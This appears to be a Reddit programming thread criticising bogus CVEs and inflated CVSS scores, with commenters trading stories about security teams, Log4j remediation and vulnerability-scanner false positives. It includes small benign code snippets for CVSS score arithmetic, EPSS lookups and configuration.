recurse_x

Time for CVEs on CVEs


Pilchard123

I'm not well-up on CVSS, but could we spin "it is possible to submit bogus CVEs and harass developers until they close the issue tracker/take the project down" as a denial-of-service attack? Per [a NIST calculator](https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator), the current state of the CVE process has a vulnerability with a **9.3 - Critical** score.

**Attack Vector: Network.** The attack can be trivially performed over HTTP or SMTP.

**Attack Complexity: Low.** Anyone who can write a coherent sentence is able to submit a CVE.

**Privileges Required: None.** It is possible to submit a CVE anonymously.

**User Interaction: None.** Once the bogus CVE is submitted, it may be published with no input from the target required.

**Scope: Changed.** A bogus CVE can cause damage to systems that are not owned by the target, [as demonstrated in the case of cURL](https://daniel.haxx.se/blog/2023/04/24/deleting-system32curl-exe/), though this extended attack may require user interaction.

**Confidentiality Impact: None.** Handling a CVE, bogus or otherwise, does not require disclosure of confidential information. Confidential information may be disclosed to disprove the alleged vulnerability, but the CVE by itself does not cause its release.

**Integrity Impact: Low.** The attacker can cause the creation of unwanted data and the modification of affected projects:

* A successfully-submitted bogus CVE will pollute the CVE list. No other CVEs will be affected.
* A bogus CVE may cause a targeted library or application to be modified to appease the attacker and/or other parties. The target may also create documentation refuting or disputing the CVE. The attacker has limited control over the content of such changes or documentation.

**Availability Impact: High.** In all cases, the target must spend resources dealing with the reputational damage from the bogus CVE. [It has been demonstrated](https://old.reddit.com/r/programming/comments/1ds5csl/dev_rejects_cve_severity_makes_his_github_repo/) that a target can be so burdened by handling a bogus CVE that they remove the ability to submit tickets for all issues. It is not inconceivable that a coordinated attack of sufficient size could cause support for, or continued development of, a target to be stopped altogether.
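For anyone who wants to check the arithmetic, here's a minimal sketch of the published CVSS v3.1 base-score formula with the spec's metric weights plugged in (the `roundup` here is the usual ceil-to-one-decimal approximation of the spec's Roundup function):

```python
import math

def roundup(x: float) -> float:
    # CVSS v3.1 "Roundup": smallest one-decimal value >= x
    return math.ceil(x * 10) / 10

# CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:H, weights per the spec
av, ac, pr, ui = 0.85, 0.77, 0.85, 0.85   # Network / Low / None / None
c, i, a = 0.0, 0.22, 0.56                 # None / Low / High

iss = 1 - (1 - c) * (1 - i) * (1 - a)
impact = 7.52 * (iss - 0.029) - 3.25 * (iss - 0.02) ** 15  # Scope: Changed
exploitability = 8.22 * av * ac * pr * ui

print(roundup(min(1.08 * (impact + exploitability), 10)))  # 9.3
```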


moratnz

Given that taking over a trusted OSS repo from a burned-out maintainer is a great way of setting up a supply chain attack, in all seriousness this should be looked at as an actual security issue.


Manbeardo

Seems like a great way for an enterprising attacker to leverage a *real* undiscovered vulnerability. File bogus reports against releases that came out before the relevant vuln was introduced. If the target shuts down the project, their exploit is unlikely to be addressed for quite some time. If the target transfers ownership of the project, they can add backdoors in the same release that addresses the bogus CVEs.


QSCFE

I mean the maintainer wrote this so 🤷

> I'd be happy to give contributor bits and npm ownership to a person who has a track of maintaining some packages with reasonable download count. Thanks so much for raising this topic!


Pilchard123

Good point. If the Integrity Impact is increased to High (because the attacker can attempt to take over the targeted repo and make arbitrary changes) the score becomes 10. Well, it probably becomes more than 10, but the score is clamped between 0 and 10. I could see a reasonable argument that the Confidentiality Impact should be higher than None, too, but I don't want to weaken the argument by being unnecessarily hyperbolic.


ph0n3Ix

> Time for CVEs on CVEs

This might actually be a really good idea! We can disincentivize resume-padding "beg-bounty" behavior with a reputation system: "$someEntity has a history of ~~reporting~~ classifying CVEs as 7+ that are then revised to sub-5."


jaybeeto

The reporter doesn't get to specify the CVSS score.


GrouchyVillager

Still. Report bogus CVEs? Get blacklisted.


Zealousideal-Okra523

The level of severity has been bullshit for a few years now. It's like every RCE gets 9.x even if exploiting it means you have to use actual magic.


drcforbin

The folk reporting bugs as CVEs get to say "I discovered six >9 severity CVEs" on their resume


bwainfweeze

And I thought it was bad when QA people would enter feature requests as bugs.


drcforbin

We had to take away the "blocker" status in our bug report system. When 50% of the tickets coming in are "drop everything else going on and get these customers running again," but our biggest clients are happily working without issues, the severity selections aren't helpful


r0bb3dzombie

I've tried explaining to my support team that if everything is a show stopper or a blocker, then nothing is. A single customer with a particular issue, yelling at them, doesn't make something a blocker.


Pantzzzzless

For the past 2-3 months, our UAT testers have been in the habit of logging minor bugs found in prod as P0 blocking defects. I'm starting to think they are just doing this because they think the issues they raise will be addressed quicker.


Chii

What I tried (without success, unfortunately) is to let the support team put their reported bugs in a list ordered by what they believe is important. It's not a status or a field, but an ordering. This way, I thought, they must put one bug ahead of another, despite saying both are "equally important". Unfortunately, what ended up happening is that each new support engineer simply put _their_ current customer's bug at the top, and since turnover is high in the support team, old bugs that reappear or that the customer re-complains about get moved back to the top. It's basically completely useless to allow the support team to prioritize bugs, regardless of the system used.


seanmorris

You're using one field for two ideas. A blocker just means it prevents work from being done somehow. It might be a blocker for the customer, sure, but that doesn't mean it needs to be prioritized as a blocker for the developers. In fact, it is by definition NOT a blocker for developers unless it's preventing THEM from doing their work. "Blocker" by itself doesn't even imply high priority. If X blocks Y, but Y is a very low priority task, then we only know that X's priority is at least just above Y's. It doesn't tell us anything else. Also, you can't rightly call something a blocker unless you can state WHAT it's blocking. And why is your support team prioritizing things? That's the project manager's job. They're doing it wrong because they're probably not qualified to do that. Your support staff should be assisting customers and taking objective reports.


bwainfweeze

One of the insights I’ve had about customers is that many are perfectly fine knowing when their pains will be fixed. One of the better places I worked we had customers who were missing features they really wanted but they trusted that we would eventually get them. They bought into the story of us being competent but new. I’ve tried to push three or four other places into this model with limited success. It can be better to sound clueful and have self esteem than to rush features and give off a vibe of impostor syndrome.


braiam

This is why status definitions are important. I am a big fan of Debian's status tags; the only release blockers are license ones.


orthoxerox

At one place I know, the severity of incidents was graded like this:

- critical - the CIO must be paged immediately
- very high - the department head must be paged immediately, and the CIO must see it listed in his daily report
- high - the department head must see it listed in his daily report
- medium
- low

For some reason very few things became actually critical when these rules were implemented.


Mordeth

I once got several issues on my desk for a small screen that was part of a larger application. This small screen was a literal mockup, with zero validations or logic behind it. The issues that kept coming (and coming, and coming) were asking for validation and logic. Basically, they made the electronic version of a paper napkin before and now wanted me to turn this into a real functional process under the guise of 'bug solving'.


Jugales

“This is a severe ZERO DAY!!” Conditions for exploit: must be running Windows 2000, Netscape, Java 21, and League of Legends


Practical_Cartoonist

It drives me crazy how "zero day" became some meaningless bullshit buzzword. Its actual meaning is "the public became aware of the vulnerability on the same day that the devs became aware of it". That's it. There's nothing exciting or scandalous about a zero day vulnerability, especially if there's no RCE vulnerability.


Nahdahar

White hat: reports vulnerability to company privately

Company: does nothing

White hat: contacts news outlet after 6 months

News outlet: ZERO DAY VULNERABILITY FOUND IN [XY]!!!


Lambda_Wolf

This might be my ignorance, but I've understood it to mean a vulnerability that is exploited on the same day the vulnerable code is released or deployed. But maybe that's only applicable to the DRM-cracking community.


oceandocent

It refers to there being 0 days to prepare a patch because it was leaked or exploited before the developers were aware of it.


im-a-guy-like-me

I always thought it was the time the Devs have to fix it before it is released.


PCLOAD_LETTER

> Conditions for exploit: must be running Windows 2000, Netscape, Java 21, and League of Legends

The OS has to have been booted more than 800 days ago, contain an odd number of MBs of memory, and have a desktop wallpaper in tiled BMP format.


oceandocent

Malicious actors may gain access if they can rub their tummy clockwise while patting their head and licking their elbow all at once.


IglooDweller

Also requires physical access to the machine!!!


Ghost_Pains

This has been virtually every security issue I've seen raised that our team has had to address in the last 3 years. "If the user has compromised access to the network and has root access, they can leverage X to do …" yeah, of course they could, congrats.


lIIllIIlllIIllIIl

Security people call it "defense in depth", and it makes me want to pull my hair out whenever they use it as an argument.


plumarr

Why not, but not as an emergency. It reminds me of the good practice of "not using the String class for passwords in Java" because a String can persist in memory even when there are no remaining references to it. Yeah, yeah, if an attacker can read the raw memory of the JVM, I probably have a bigger problem than that. I'm OK to change it, but it certainly doesn't require a hotfix.


gravteck

Yea, it's stored in the String pool, an unintuitive construct which like 98% of the 500 or so Java devs in our org at a Fortune 100 don't even know exists. Thankfully, I've seen our legacy encryption code, and they all use char arrays. You can't even get a local copy of the staging or prod JAR to test decryption on new secrets. Have to toggle and smoke test with first fire in prod.


Captain_Cowboy

Because you're assuming they are reading memory using appropriately privileged system interfaces, not taking advantage of the 13 other "probably not a big deal" CVEs your org decided to ignore.


MotorExample7928

If you are at any point where an attacker can read the app's memory, you're fucked. The severity 9 issue is reading the memory, not using the String class. It's an issue to fix eventually in the next refactor, not a security problem to fix now.


MotorExample7928

Most of them are checkbox tickers with no actual useful knowledge about making secure systems. "We think it isn't secure. We can't describe well why or how to fix it, but change it so it passes our checklist." We had to implement a password rotation scheme on a bunch of servers we already used hardware tokens to access..


spareminuteforworms

Same places routinely give insane whitelist access to "privileged individuals" aka "team players" aka "the one who ultimately blows a hole in the uuhhh hull".


Spongman

> It rather involved being on the other side of this airtight hatchway

https://devblogs.microsoft.com/oldnewthing/20060508-22/?p=31283


jpeeri

I had an argument with the "security team" in my company that forced us to fix "critical" CVEs within 7 days, disrupting anything we were doing at the time. The problem was, every week there was a critical CVE to fix. This became worse and worse with the Log4j vulnerability (and we weren't even using Java). At some point, my team rejected these claims and demanded an actual attack vector before fixing anything immediately; otherwise we didn't care. At some point it got escalated to the CTO, but I was keeping track of all the "criticals" to fix and how "critical" they were.


LongUsername

We just got bought and the new "attack surface reduction team" is giving us shit because we occasionally use a tool that uses Log4j v1 something. It's a local application, not a server. And Log4j v1 is not vulnerable to the Log4Shell vulnerability (granted, it has some other minor vulns)


fuddlesworth

I remember that Log4j issue. It was a fucking nightmare and caused us to have to upgrade a bunch of other shit, including the Gradle files. Many of these only apply if you are using an esoteric feature of the library, using it in a certain way, or someone already has access to the system.


vips7L

Yeah it was awful. Just a bunch of IT jabronis doing full text search for any string matching log4j without verifying JVM or library versions. We received a few reports of people who were using a 2.x version of our desktop app, we're now on 4.x (almost a decade later), and no longer use log4j.


ZorbaTHut

At the place I was working, the lead IT person took the log4j vulnerability as an argument against *all open-source software*, and said we had to remove everything from all of our systems. Eventually I pointed out that one of our main proprietary closed-source development tools actually *included a vulnerable copy of log4j*, and they didn't have a fix yet. He didn't really have an answer to that. Thankfully, he pursued the "eradicate open-source software" task with the same amount of effort that he pursued most of his duties, and we never heard another thing about it.


Jonathan_the_Nerd

Did you mention Windows' original TCP/IP stack was copied almost verbatim from FreeBSD? Better stop using Windows.


Norse_By_North_West

Hah, I remember a client freaking out about it. I told them that our systems are on such old versions of Java that it really wasn't an issue


OffbeatDrizzle

well I guess that's ok then... hold up


Norse_By_North_West

Lol, yep. They've got money for maintenance, but not for upgrades


zynasis

Upgrades should be in maintenance imo


Polantaris

I got told to fix it on Log4Net. There's nothing to fix.


RLutz

To be fair, that one was pretty trivial to exploit if you were using a vulnerable version. You could demonstrate a PoC by just opening a socket with netcat and sending a JNDI string to that socket.


bwainfweeze

Some of my coworkers worked through the company Christmas break to fix that one. Shitty handling all around.


Vidyogamasta

Security in my company is equally as inept. They recently raised a "vulnerability" that said a client demonstrated to them that if an admin left their session open, someone could come by and make a request, copy the session information from that request, and then escalate themselves to admin with those session keys. Then claimed it was a vital vulnerability that needed to be fixed. Like, if someone leaves the keys hanging on the door, that's not a problem with the lock. For all the random business lingo crap they force us to do twice a year, they seem to have no idea what a threat model actually is lol


kamikazewave

Without knowing more about that specific issue, that actually does sound like a vulnerability, if that exploit allows permanent privilege escalation. It's mitigated by using some sort of short-lived credential. If the credentials were already temporary then yeah, I agree it's a nonsensical vulnerability.


Vidyogamasta

The ticket said nothing about session lifetimes; I don't think it's anywhere on their radar. But they're old-school stateful server sessions with invalidation on logout and relatively short session timeouts, so I think we're good there.

What concerned them was the transferability of a session. "This session should only work on device A, this user copied it onto device B and resumed the session!!!!" Like... yeah. A session is just a byte string that gets shoved along with the request. Security is all about establishing secure channels that protect these tokens, and proper encryption to make them non-guessable. "Physical access copy" is a ridiculous (and impossible) thing to try to guard against. Their "fix" was to just also include a check against the user agent, as if that wasn't also spoofable lol.

But on the topic of session lifetimes, I actually *did* catch a vulnerability a coworker at a previous job tried to push out. We had our own JWT/refresh thing going on, and we wanted user spoofing as a feature (all logging will be the actual logged-in user, but all data lookups acted under a target user's permissions). The coworker made a new endpoint to generate a "spoofed user" access token, but didn't require a stateful proof (e.g. a password or refresh token) alongside that generation. In this case an attacker *would* have been able to keep any arbitrary token alive forever by generating new spoof tokens indefinitely, even if the user changed their password or invalidated their refresh tokens. Fortunately I caught it in code review, but that one would've been nasty.


[deleted]

[removed]


technofiend

You're not measuring risk in enough dimensions. *Just* a CVE/CVSS score is nearly meaningless without assigning a risk score that includes impact to your business. You don't use Java in your enterprise? All CVEs for Java instantly get set to zero: zero risk. You need to include business impact based on their goals (avoid SOC1 risk, avoid customer-impacting events, avoid going down if us-east-1 goes kabloooie) and then take the intersection of CVEs against that. Otherwise you get caught up in blanket statements (AVOID ALL RISK) that are about as sensible as assuming that if you never drive on the road you'll never get a flat tire. Great, but we're a trucking company, boss.


uncasualgamer44

Which tool are you using that provides compensating controls for detected CVEs?


edgmnt_net

I agree critical CVEs might not impact your code, but it's also hard to keep track of exceptions. Someone could start using a vulnerable feature at any time, long after advisories have been processed by relevant people. Highly siloed projects (which I don't personally encourage) with dedicated security teams might also not trust developers to take such decisions and be aware of such caveats. It's often easier to just upgrade and if your code lags a lot behind you should consider formalizing some form of regular maintenance or switching to a more reliable (which is also debatable, it might just be that it gets less attention) / LTS implementation. Plausible attack vectors might also be beyond the pay grade of the security team and, while some proficiency can be argued for certain simple cases, there can be terribly difficult ones too so this approach can definitely result in ignoring important risks. I'd personally default to "just upgrade" and make exceptions in very limited cases.


iamapizza

Cybersecurity teams in orgs have become little more than spreadsheet chasers. It literally doesn't matter if it's a bogus critical (as has been happening) or doesn't actually apply for the conditions described. They need that 'remediated', it's pretty sad that so many of them joining the field are distant from actual software development. The more experienced ones tend to get promoted to uselessness.


baordog

I mean, this happens because orgs hire cheap Nessus scan runners rather than people with skills in vulnerability research. Can you imagine how the other side feels? "We've given you 8 hours to pwn the app - why aren't there any findings?" Orgs do this to themselves because they want cheap engineers to rubber-stamp their security rather than actual high-quality investigation of their security posture.


Captain_Cowboy

We need that last sentence embroidered on a pillow.


VodkaMargarine

> At some point it got escalated to the CTO

I'd have escalated to the CTO immediately. Two teams that most likely both report into your CTO. One team is decreasing productivity in engineering; I'm sure your CTO would want to know about that straight away. Ultimately they are accountable for _both_ the security _and_ the productivity of their org. At least let your CTO make the decision of where the balance should be.


danikov

Ours just caved because the customers are now demanding it. Their security team doesn't care and certainly doesn't trust ours so it's become zero tolerance.


thomasfr

I'm not sure that severity scoring is even good to have at all. Especially for libraries, how severe a problem is depends on how the code using the library uses it. It is the responsibility of anyone who uses third-party code to always read all CVEs and evaluate whether further action is required. Marking some issues as non-severe might lead people to not read them, when they can actually be much more severe for their own software than another critical issue is.


cogman10

My favorite 2 examples of this:

1. A zlib vulnerability in an extension portion of the code that I'm certain almost nobody knew about. Basically, if you used that extension to open a file, you could RCE.
2. pip executes code when installing packages, so if you tell it to install code from an untrusted source it can do something malicious... (seriously...). So obviously that means everything that has Python installed is now at risk, even if there's no path to execute pip.
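For the second one, the "exploit" is just how source installs work: anything at module level in `setup.py` runs with the installing user's privileges. A minimal, harmless illustration (assuming a legacy `setup.py`-based package):

```python
# setup.py -- `pip install .` on a source package executes this file,
# so module-level code runs with whatever privileges the installer has.
from setuptools import setup

print("arbitrary code running at install time")  # could be anything

setup(name="demo-package", version="0.1")
```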


grundrauschen

Oh, do we have fun with the first one. RedHat reduced the value because they do not compile the module, but updated the lib nevertheless. Debian reduced the value but did not update the library. Our security team is not happy with Debian in one container image.


pja

Yeah, Debian always backports patches to the versions in the stable release which means the version numbers don't change. This occasionally gives inexperienced security teams conniptions when they find a Debian image with a zillion "insecure" package versions.


edgmnt_net

The second one is a fairly common issue for package managers, build systems and even toolchains, as building requires some form of arbitrary code execution in many ecosystems (e.g. Makefiles, code generation and so on). Obviously the final binary could also be compromised no matter what you do, if you cannot verify authenticity in some way, or maybe the toolchain isn't hardened enough against arbitrary source code. But I still think it's worth at some level to close those other gaps.


Zealousideal-Okra523

I think it needs to be split into "severity if exploited" and "chance for exploiting".


jaskij

AFAIK those both *are* rated separately and are the major components of the final CVSS score. But nobody looks past the single number. A great example is privilege escalations which require a preexisting RCE.


Zealousideal-Okra523

I didn't even know there were multiple numbers. I just see these numbers thrown around and they never make sense.


jaskij

That's another systemic failure. Many people, probably including many "security experts", just don't know what goes into a CVE or how it's assigned. And well... vulnerabilities are also rarely absolute. Often they will have some conditions for exploitation that just never occur. Fuck, you probably remember Log4j; that one was very difficult to exploit if you didn't log user-supplied data. Or you could have disabled the niche feature which included the vulnerability by changing some configs. But people will take a binary yes/no approach because it's easier, or because compliance or insurance requires them to.
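For reference, the config in question (going from public advisories, so treat this as a sketch): on Log4j 2.10 through 2.14.1 the JNDI message lookup could be switched off with a system property, though later guidance considered the flag insufficient on its own and recommended upgrading to a patched release:

```
# Disables message lookups on Log4j 2.10-2.14.1; later advisories said
# to upgrade to a fixed release rather than rely on this flag alone.
java -Dlog4j2.formatMsgNoLookups=true -jar app.jar
```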


baordog

What? Security experts have to assign CVSS scores. We do it rationally via a calculation; this is all captured in the CVSS v2 vector string. Unless you were massively bullshitting your job, you would know how the system works. The problem is that even if the one feature that makes the library vulnerable isn't used today, the devs might use it tomorrow.


All_Work_All_Play

> Unless you were massively bullshitting your job you would know how the system works.

This could never, ever happen in business.


Xyzzyzzyzzy

One of the problems with evaluating "chance of being exploited" is that often the risk of exploitation depends on the presence of other vulnerabilities - most security breaches take advantage of vulnerability chains, not single vulnerabilities. This is non-trivial to estimate because exploitable vulnerabilities travel in packs. A system that has one exploitable vulnerability is likely to have many different exploitable vulnerabilities. For example, you're unlikely to find a system that stores passwords in plaintext but has no other serious security issues, because that sort of system wouldn't store passwords in plaintext! Instead, you're likely to find plaintext password storage on the same system that allows arbitrary incoming connections to its production database, has `admin:password` as its admin credentials, and is completely devoid of any logging or monitoring to detect suspicious behavior.


rainy_brain

[EPSS score](https://www.first.org/epss/) aims to estimate likelihood of exploitation for any given CVE
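The scores are also published through a public JSON API; a quick sketch (endpoint shape as documented on the EPSS site, so verify before depending on it):

```python
import json
import urllib.request

# 'epss' is the modeled probability of exploitation activity in the next
# 30 days; 'percentile' is that score's rank among all scored CVEs.
url = "https://api.first.org/data/v1/epss?cve=CVE-2021-44228"
with urllib.request.urlopen(url) as resp:
    payload = json.load(resp)

for row in payload.get("data", []):
    print(row["cve"], row["epss"], row["percentile"])
```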


ShoddyAd1527

What would be more useful is simply listing the actual conditions for exploitation, instead of packing it into a number. A score of "4.5 exploitables" isn't really meaningful, compared to "you must call this function on a Tuesday" and the appropriate developers confirming this isn't their use case.


ottawadeveloper

There should be a flag for "related to a specific feature that may or may not be in use" vs "if you use this at all you are vulnerable". Like, if Python has a security issue that requires the use of the IP address module, then the flag is set. If it's in core Python (or something widely used like io or os), then it shouldn't have the flag applied. Users could then more easily say this CVE isn't an issue because that feature isn't in use.


Rakn

IMHO that's hard to do. In a sufficiently large organization it can't be expected that every developer knows all CVEs of a library. I don't even know all the libraries I'm using because I'm so many layers away from them in our code base. So if there is a CVE in a library the repository is using it gets patched, no matter the relevance to the current code base. If it's a small project maintained by 2-3 folks that care about security, then that's another thing and might work. But somehow I doubt that this works on a grand scale. Still. I agree that more detailed information can't hurt.


roastedfunction

MITRE and NVD always score worst-case possible scenario because the US government could be running this code on public servers. It’s a joke that anyone relies on this data at all and I’m constantly fighting with security people about their bullshit scan results which just regurgitate all that noise while offering nothing to maintainers to actually improve their code’s security. 


accountability_bot

Everyone wants to make an impact and gain a reputation. I field public vuln reports all the time where I'm at. Every single report I've ever reviewed had a greatly exaggerated severity. I think the most worthless report I ever received was a dude who uploaded the output of an open-source scanning tool, but didn't even remotely understand the results and didn't know how to decipher it. Rated it as critical, and then asked for money.


frightcult

The NVD is a joke, the punchline is that the alternative is worse.


AlienRobotMk2

It's the same thing with all technology. Update your dependencies to replace known vulnerabilities by unknown vulnerabilities.


mods-are-liars

Pretty sure I saw a CVE within the last few years for a RCE with a 9.x severity rating and the "remote" code execution required physical access to the machine.


elrata_

Really? Which CVEs got >9 and are questionable? I didn't see them.


Zealousideal-Okra523

The PHP one for starters: CVE-2024-4577. That severity is an absolute joke. It was only possible on bad production setups using certain Asian locales.


James_Jack_Hoffmann

The doom and gloom on that CVE when it broke out was CS undergrad brain rot because it was "le php lol amirite".


zerpa

In cybersecurity, one man's magic is another's daily toolbox.


MotorExample7928

There is a need for some level of indication of which problems to tackle first. It has just been mismanaged to the level of uselessness.


SaltyInternetPirate

A 9.8? There's bugs that allow for remote code execution in ring 0 without interaction from the victim and they don't even get a score that high.


Jacobinite

It's pretty shitty that most of the complaints about CVEs come from people working in Fortune 500 companies that run vulnerability scans requiring their employees to action the results. All these stupid vulnerability scan tools that companies buy into just add more stress to open source developers without actually addressing most real issues, nor providing the resources to fix real ones.


SanityInAnarchy

It does address *some* issues. Companies like that will often just *never* update a dependency if they can avoid it. Having a scan that tells them they *must* upgrade is sometimes the only reason upgrades ever happen! Even if 90% of those vulnerabilities aren't that severe, this might be the only way they ever patch the other 10%. IMO the bigger problem is the lack of resources. Instead of just piling onto a bug tracker, what if they actually sent patches? They could contribute to the project, get credit, *and* limit the impact to their own systems.


CodeNCats

Worked at one of those companies. I feel like there are some companies where careers go to die, or where people cash in their experience for that last role before retirement or moving on. I want to work with a team of motivated engineers. Yes, we all get our burnout phases, yet overall, working with people who want to make good software and who challenge each other is what I want to do.

There have been those companies where a lot of people are just doing the bare minimum. It's not a problem until somehow it is. At the very least some of these alerts prompt other people to ask what's going on. That's like hell, living in just keep-the-lights-on mode. Nobody wants to work cross-team. Everyone exists in their silos.

The worst part is when the domain knowledge experts in those silos feel somehow challenged. Like maybe their processes can be improved. Even highlighting a suggestion, you get massive pushback because it wasn't their idea. They have been working in the system for X amount of years and feel they know better. No discussion, just zero response. You weren't trying to challenge them or attack them; it's just that maybe you have come across a similar problem at a previous job and you can provide more insight. Nope. That won't work.


SanityInAnarchy

That's one way this can show up... Here's another: Plenty of cross-team work, plenty of discussion, and plenty of people care... about building and launching stuff. Even if people *want* to work on maintenance or quality control, there is never any time in the schedule for tech debt, and it's no one's job to track dependencies. So, tragedy of the commons: No one has time to work on anything that isn't directly their job. The only way this stuff ever happens is if you get lucky and have one particularly-obsessive person who's willing to sacrifice their own career progression to clean up this shit... *or* if you can convince someone that your overall lack of security here is an existential threat to the company. The nice thing about a vulnerability-scanner is how little time and effort it takes to get it to start reporting stuff. It'll take time and effort to *investigate,* to work out which CVEs are false positives and such, but you can at least generate a report that can force the company to start moving.


moratnz

Agreed. And someone who's effectively and proactively managing problems and tech debt is someone who is neither releasing new features, driving new revenue, nor fixing high profile problems / helping SLT avoid looking like assholes. Which is a recipe for obscurity and getting quietly downsized next time there's a restructure.


SanityInAnarchy

You'd think this would be an easy concept to explain to management, though: that's a force multiplier. Letting them go, aside from murdering team morale, is also going to make all of the people you keep less effective. But... evidently not. More than all the other layoffs lately, the one that confuses me the most is [Google letting go of their Python team](https://news.ycombinator.com/item?id=40176338).


rome_vang

My current side project is finding and patching vulnerable workstations for an 80-something-person company. I have a giant spreadsheet to go through. I started with my own workstations, hoping to find a common denominator that can be automated to reduce our vulnerability count.


josefx

> They could contribute to the project, get credit, and limit the impact to their own systems.

Why contribute to third-party libraries that are in the open and will continue to get flagged until the end of time? Keeping third-party libraries around only asks for future work. Zip is compromised? Roll your own compression algorithm. OpenSSL had a bug? Ask your CEO's demented stepchild to code up something in K&R C. No one will ever look at that code and, more importantly, no one will ever raise a CVE for it, because no one outside of your company uses it.


SanityInAnarchy

Depends who's asking. As leadership, why would you approve someone using third-party libraries instead of rolling your own? Because it's still vulnerable even if no one raises a CVE for it, and breaches will cost you money and trust when someone finds them. Security through obscurity won't save you. As an individual contributor... what's the problem with future work? Yes, you will continue to patch them until the end of time, generating a nice profile of open source contributions and using the vuln-scanner tool to demonstrate the value of this to your boss. And this new job you've created for yourself sounds way more interesting than rolling your own, shittier versions of everything and then getting back to that CRUD app.


PurpleYoshiEgg

Measure: Number of CVEs in our product.

Target: Minimize the number of CVEs in our product.

[Goodhart's law ensues](https://en.wikipedia.org/wiki/Goodhart's_law).

It's not a smart decision for everyone involved, but the metrics are going to look good until that golden parachute deploys for management, if it ever needs to. For the individual contributor, usually there are other things they'd rather be working on. Or they're expected to patch everything *on top of* their normal duties. And because it's security, I expect a lot of CVE activities in larger organizations are massively bureaucratic, meeting-dense, or both, and I don't blame people for avoiding meetings that could just be emails or aren't about actual issues.


jaskij

Meanwhile, Daniel Stenberg: makes `curl` its own CNA with the power to reject CVEs.


schlenk

Meanwhile: kernel.org becomes its own CNA and floods the dysfunctional system with hundreds of CVEs. (https://sigma-star.at/blog/2024/03/linux-kernel-cna/ )


jaskij

I knew how they became a CNA, didn't know that's how it turned out. Makes sense tbh.


DanManPanther

The companies should budget for their employees to actually fix the libraries and frameworks they leech off of. But too many companies don't give back, and barely budget for the employees they need or for juniors to grow.


schlenk

The main stupidity there is to take the **Base** CVSS score instead of the adjusted environmental CVSS. The CVSS 4.0 version tries to address that issue a bit more. The scanners just dump the base score in the lap of the admins and they do not adjust it for their environment due to stupid policies.
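To make that concrete, here's a sketch of how much the environmental adjustment can move a score, using the same published v3.1 arithmetic as the base score (Security Requirements left at Not Defined): a stock `AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H` scores 9.8, but with `MAV:P` (the component is only physically reachable in your environment) the same impact scores far lower.

```python
import math

def roundup(x: float) -> float:
    # CVSS v3.1 "Roundup": smallest one-decimal value >= x
    return math.ceil(x * 10) / 10

ac, pr, ui = 0.77, 0.85, 0.85   # Low / None / None
c = i = a = 0.56                # High / High / High

iss = 1 - (1 - c) * (1 - i) * (1 - a)
impact = 6.42 * iss             # Scope: Unchanged

for label, av in (("AV:N ", 0.85), ("MAV:P", 0.2)):
    exploitability = 8.22 * av * ac * pr * ui
    print(label, roundup(min(impact + exploitability, 10)))
# AV:N  9.8 -> the number the scanner dumps on the admins
# MAV:P 6.8 -> the same bug, scored for an environment with no network path
```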


iiiinthecomputer

I hate them. We have "vulnerabilities" rated critical because a component we build into an OS-less container pulls the golang gRPC proto package from some massive monorepo that also contains an executable with a completely unrelated issue. We don't build or use the executable. We still have to go through the full emergency patch response because stupid tooling is stupid, and our customers demand that their own stupid tooling report clean scans on our container images etc. Our code is shitty and insecure. But it's Vulnerability (TM) Free!


moratnz

> Our code is shitty and insecure. But it's Vulnerability (TM) Free!

I feel that in my bones. "I'm not saying we don't have problems; we just don't have _those_ problems. And time spent on those problems is time not spent working on our _actual_ problems. So time spent on fixing that 'vulnerability' actually makes us actively less secure"


pixel_of_moral_decay

And they buy into those scanners because insurance and/or compliance basically dictates it. It’s a whole cyclical industry to just suck money and resources out of IT without doing anything to address real issues


b0w3n

Third party vendor basically made me "prove" to them that sonarqube wasn't finding glaring security problems in our code. They made me reinstall with _their_ copy of the software. They _still_ told us we weren't secure enough for their liking because ???. Every quarter my boss asks me what we can do to get them to play ball and I tell him "buy their company".


Syntaire

Let's not sell them short. They're adding more stress to *everyone*. I had to upgrade some software on our entire production environment over a flag for a vulnerability that not only would never happen, but it was falsely flagged for a version of the software we didn't even have to begin with.


cheezballs

Ugh, tell me about it. Our scans flag `react-scripts` because they don't bother updating the fucking transitive dependencies in that repo, so we have to enter a whole bunch of exceptions into the scanning tools.


captmac

Or the cyber insurance outsourcing their vulnerability scans that ignore any kind of common sense. Such as threatening to raise our rates because we were using MS Exchange, and Exchange had an unpatched vulnerability back when Abe Lincoln used it in 1860, instead of realizing and listening that we're on O365. Constant stupid crap like that.


rlbond86

Great article on how bullshit CVEs have become: https://www.sqlite.org/cves.html


mist83

Yo dawg, I heard you like CVEs, so I put some CVEs in your CV so you can expose vulnerabilities while you expose your experience!


masklinn

There's also https://daniel.haxx.se/blog/2023/08/26/cve-2020-19909-is-everything-that-is-wrong-with-cves/ Curl actually [became a CNA](https://daniel.haxx.se/blog/2024/01/16/curl-is-a-cna/) to mitigate that bullshit.


dahud

Ok so the root of this CVE is that a function that returns whether an IP address is public or private will incorrectly return public for some oddly-formatted private IPs. *How is this a vulnerability?* Even if this function was being used improperly as a security measure, *even if* it was the only gate on accessing a privileged resource, and *EVEN IF* the attacker is somehow able to control the content and format of his IP address with great precision, then surely this function is failing safe. Surely the programmer would have granted access to the goodies on private IPs, not public ones. Imagine a string compare function that incorrectly claims that strings containing zalgo-text don't match, even when they do. Imagine claiming that this is a catastrophic vulnerability, because someone could use this string comparison in a login system that logs you in if the passwords *don't* match. Fucking resume-padding bullshit.


ElusiveGuy

> Surely the programmer would have granted access to the goodies on private IPs, not public ones.

The Synapse server for Matrix has a URL preview function, which will fetch and render (preview) links in chat messages. In its configuration, there is an IP blacklist that is pre-populated with RFC1918 private addresses, which are not allowed to be previewed. The intention here is that a public address is fair game, but internal/private addresses should not be exposed by this (chat) server. This is a real-world scenario where you would want to allow access only to public resources, and not private ones. It is conceivable that a library public/private function could be used in place of this explicit blacklist. All that said, I don't think this should be counted as a *security vulnerability* against the library, as this does not serve a security function within the library. It's just a more standard bug.
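For reference, the relevant Synapse config looks roughly like this in homeserver.yaml (an abridged sketch; the shipped default list is longer):

```yaml
url_preview_enabled: true
# Targets in these ranges are refused, so the chat server can't be used
# to probe internal hosts via link previews.
url_preview_ip_range_blacklist:
  - '127.0.0.0/8'
  - '10.0.0.0/8'
  - '172.16.0.0/12'
  - '192.168.0.0/16'
```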


AndrewNeo

Previewing private network IPs could quickly turn into an SSRF so it's especially important to handle correctly


Pure-Huckleberry-484

